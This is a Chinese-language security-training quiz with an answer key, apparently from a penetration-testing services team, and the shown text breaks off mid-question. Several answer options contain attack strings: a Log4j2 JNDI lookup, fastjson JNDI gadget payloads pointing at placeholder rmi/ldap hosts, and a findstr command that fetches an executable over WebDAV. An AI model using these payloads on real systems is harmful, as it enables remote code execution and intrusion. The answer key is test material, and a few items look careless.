启明星辰OBG战略安全服务中心-ASC1上海-技术分享自测评附有答案

启明星辰OBG战略安全服务中心-ASC1上海-技术分享自测评[复制]您的姓名：[填空题]*_________________________________1.下列不表示是或否的是（）？[单选题]*A:1like1B:mod（7,8）in（1）C:1==1(正确答案)D:1rlike1答案解析：C不表示为true或flase2.哪个不是抵御对抗样本攻击的常见方法？[单选题]*A:图像预处理B:自编码器去噪C:渗透测试(正确答案)D:高斯数据增强3.windows远程下载是下列选项中的哪个（）？[单选题]*A:findstr(正确答案)B:cscC:mshtaD:rundll32答案解析：findstr可以下载webdav资源findstr/V/Lzxc\\webdav\test.exe>C:\test.exe4.LOG4j2反序列化Payload格式[单选题]*A:${jndi:ldap://.exp}(正确答案)B:{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi","autoCommit":true}C:{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit","autoCommit":true}D:{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}5.Fortify命令行参数正确的是[单选题]*A:sourceanalysisB:sourceanalyzer(正确答案)C:sourceanalyzeD:sourceresolve答案解析：正确的命令参数为：sourceanalyzer-bbuildid-clean6.以下说法不正确的是[单选题]*A:项目实施现场仍按照公司通勤时间上下班(正确答案)B:发送项目有关材料时采用加密方式C:无法处理的问题第一时间内部反馈，及时协商解决方案D:项目实施过程中如需请假，提前告知直属领导及项目经理7.以下说法不正确的是[单选题]*A:渗透测试应保持漏洞挖掘的全面性B:渗透测试报告中应详细记录漏洞细节，并合理给出整改建议C:项目实施中如遇技术问题选择不反馈/不测试解决(正确答案)D:按时按质交付项目报告，不拖延不漏测漏写8.以下说法不正确的是[单选题]*A:项目实施过程中无项目卡及时告知项目经理建卡B:如交付报告存在格式问题或内容有误拒绝整改或不配合整改(正确答案)C:严格按照项目要求执行项目实施与交付，按时提交周报D:与客户的交流过程中或交付材料中保持专业性，尽量避免口语化内容9.下列哪个不是JWT令牌的组成部分[单选题]*A.HeaderB.PayloadC.SignatureD.body(正确答案)答案解析：JWT令牌由Header、PayloaD:Signature三部分组成10.Django的环境配置文件是（）[单选题]*A:urls.pyB:settings.py(正确答案)C:views.pyD:models.py答案解析：setting.py是Django的环境配置文件11.Django中views.py与哪个py文件对应（）[单选题]*A:apps.pyB:urls.py(正确答案)C:models.pyD:apps.py答案解析：view.py的函数与url.py中的path相对应，12.一个小程序主体部分由三个文件组成，必须放在项目的根目录，以下哪一项不属于小程序主体部分？[单选题]*A.app.jsB.app.wxssC.app.css(正确答案)D.app.json答案解析：小程序包含一个描述整体程序的app和多个描述各自页面的page。一个小程序主体部分由三个文件组成，必须放在项目的根目录，如下：app.js必需小程序逻辑app.json必需小程序公共配置app.wxss非必需小程序公共样式表13.垂直和水平越权是基于（）的访问控制？[单选题]*A:基于角色和数据(正确答案)B:基于角色和角色C:基于数据和角色D:基于数据和数据14.无论哪种访问控制方式，都要遵循（）[单选题]*A:最大权限原则B:最小权限原则(正确答案)C:系统权限原则D:程序权限原则15.下列工具中用于验证数字签名的是（）[单选题]*Adex2jarBjd-guiCjarsigner(正确答案)Dapktool16.IDA中如何查看伪代码？[单选题]*A:F5(正确答案)B:F9C:F10D:F12答案解析：F5为反编译为伪代码的快捷键。17.以下哪个是跟踪调用堆栈的工具（）？[单选题]*A:fridaB:frida-trace(正确答案)C:idaD:iproxy答案解析：frida-trace为跟踪方法调用堆栈的工具18.在视频剪辑软件PR中，默认的图片展示时间为（）？[单选题]*A:1sB:3sC:5s(正确答案)D:10s答案解析：默认时间为5S19.时间轴面板中，音轨的M代表（）？[单选题]*A:标记B:静音(正确答案)C:独奏D:默音20.以下可以实现命令执行的是？[单选题]*A:java.lang.Runtime#execB:java.lang.ProcessBuilder#startC:java.beans.Expression#getValueD:以上都正确(正确答案)21.天清安全事件发生告警，第一步首先确定（）[单选题]*A：协议类型B:源ip，目的ip(正确答案)C：端口号D:是否已失陷答案解析：A：真实场景下安全事件往往很多，如果攻击时间协议未HTTP/HTTPS，筛选出来的事件依旧很多，不适合第一步分析取证。B：可以明显地看到攻击者对被攻击者做的攻击行为，如果是暴力破解，则效果更加显著。C：在特殊场景下也可以使用，但是通用性不如B。D：第一步很难判断是否失陷。22.天阗的作用是什么？[单选题]*A：WAFB:IPSC:APT(正确答案)D:IDS答案解析：天阗是APT23.可以伪造User-Agent头的工具有（）？*A:Burp中proxy模块(正确答案)B:Burp插件AutorizeC:火狐插件User-AgentSwitcher(正确答案)D:Burp插件Customizer答案解析：B：为检测越权插件D:为burp皮肤插件24.对抗样本按照攻击目的可以分为哪几种攻击？*A:定向攻击(正确答案)B:非定向攻击(正确答案)C:黑盒攻击D:白盒攻击25.http请求走私形成的原因（）*A:keep-alive(正确答案)B:pipeline(正确答案)C:代理服务器(正确答案)D:transfer-encoding(正确答案)E:content-length(正确答案)26.HTTP/2请求走私与htpp/1请求走私的不同（）*A:二进制协议(正确答案)B:内置消息长度(正确答案)C:transfer-encodingD:伪标头(正确答案)27.windows快速系统调用是下列选项中的哪俩个（）？*A:sysenter(正确答案)B:syscall(正确答案)C:fastcallD:stdcall答案解析：A:B分别是x86、x64下的系统调用指令，C:D则是函数调用约定28.常见的LOG4j2漏洞利用点*A:user-agent(正确答案)B:referer(正确答案)C:XFF(正确答案)D:URL参数(正确答案)答案解析：该漏洞的利用点在请求中的任何参数的位置都有可能，需要服务端将请求发来的参数放到error或debug函数中执行才能触发反序列化，所以需要多次测试29.LOG4j2反序列化利用的协议是？*A:JNDI协议(正确答案)B:RMI协议(正确答案)C:HTTP协议D:T3协议答案解析：AB为常用的java远程调用协议，C为超文本传输协议，D为weblogic中常用的反序列化协议30.软件生命周期包含以下（）阶段*A:定义和规划(正确答案)B:软件设计(正确答案)C:程序编码(正确答案)D:持续部署答案解析：软件生命周期：定义和规划、需求分析、软件设计、程序编码、软件测试、运行维护；持续部署属于CI/CD流程体系，故不算在周期的大阶段中31.JWT的验证流程包括下列哪些？*A.验证算法(正确答案)B.验证签名(正确答案)C.对jwt解密(正确答案)D.验证过期时间(正确答案)答案解析：JWT会验证算法签名解密以及过期时间32.下列是测试越权的工具的有（）*A:Autorize(正确答案)B:AutowaspC:Authz(正确答案)D:ActiveScan++33.下列属于android四大组件的是（）*A:activity组件(正确答案)B:drozer组件C:service组件(正确答案)D:contentproviders组件(正确答案)E:editor组件34.Java反射操作的是java.lang.Class类对象，以下哪些⽅式可以获取⼀个类的Class对象？*A:类名.class(正确答案)B:Class.forName（）(正确答案)C:ClassLoader.loadclass（）(正确答案)D:对象.getClass（）(正确答案)35.WAF是否具有双层防盗链链接模式？[判断题]*对(正确答案)错答案解析：WAF具有双层防盗链链接模式36.对抗样本是AI安全领域的一类安全问题，攻击者通过在原数据上增加机器学习模型可接受而人类难以通过感官辨识的细微改变，使得机器学习模型做出错误的分类决定。[判断题]*对(正确答案)错37.HTTP/2请求走私原理是进行降级为HTTP/1.X吗?[判断题]*对(正确答案)错38.csbeacon可以用pipe通信吗？[判断题]*对(正确答案)错答案解析：横向移动的时候使用命名管道进行通信39.若要修复代码：Processprocess=Runtime.getRuntime（）.exec（osCommand+data）;可对参数osCommand和data做好过滤和验证[判断题]*对(正确答案)错答案解析：因缺少前后文联系，且exec为不安全函数，所以对两个参数都应该进行有效的验证40.JWT令牌传输时不会造成敏感信息泄露[判断题]*对错(正确答案)答案解析：在登陆后某些开发会把用户的密码、个人信息等敏感数据写入令牌中41.启动Django项目前是否要将对应的APP进行注册[判断题]*对(正确答案)错答案解析：Django项目前要将对应的APP进行注册，否侧无法使用42.微信小程序合并主分包时，可直接将分包与主包名称相同的文件夹合并在一起即可[判断题]*对(正确答案)错答案解析：在合并主分包时，参照主包中的app.json文件，根据root值看到分包名称将对应的分包文件放到主包中的路径下面43.在做apk文件完整性校验时先对文件进行解包，随机替换文件内的一个文件，一般替换logo图片，替换后把文件重新打包成apk并进行签名，如果没有报错说明没有风险。（）[判断题]*对错(正确答案)44.+[UIDeviceisProxy]必须实例化后才能调用。[判断题]*对错(正确答案)答案解析：标识为+的方法，无须实例化可直接调用。45.镜头切换是指前一个镜头的最后一个画面结束，到后一个镜头最后一个画面结束的过程。[判断题]*对错(正确答案)答案解析：镜头切换是指前一个镜头的最后一个画面结束，到后一个镜头第一个画面结束的过程。46.Java反射（Reflection）是Java⾮常重要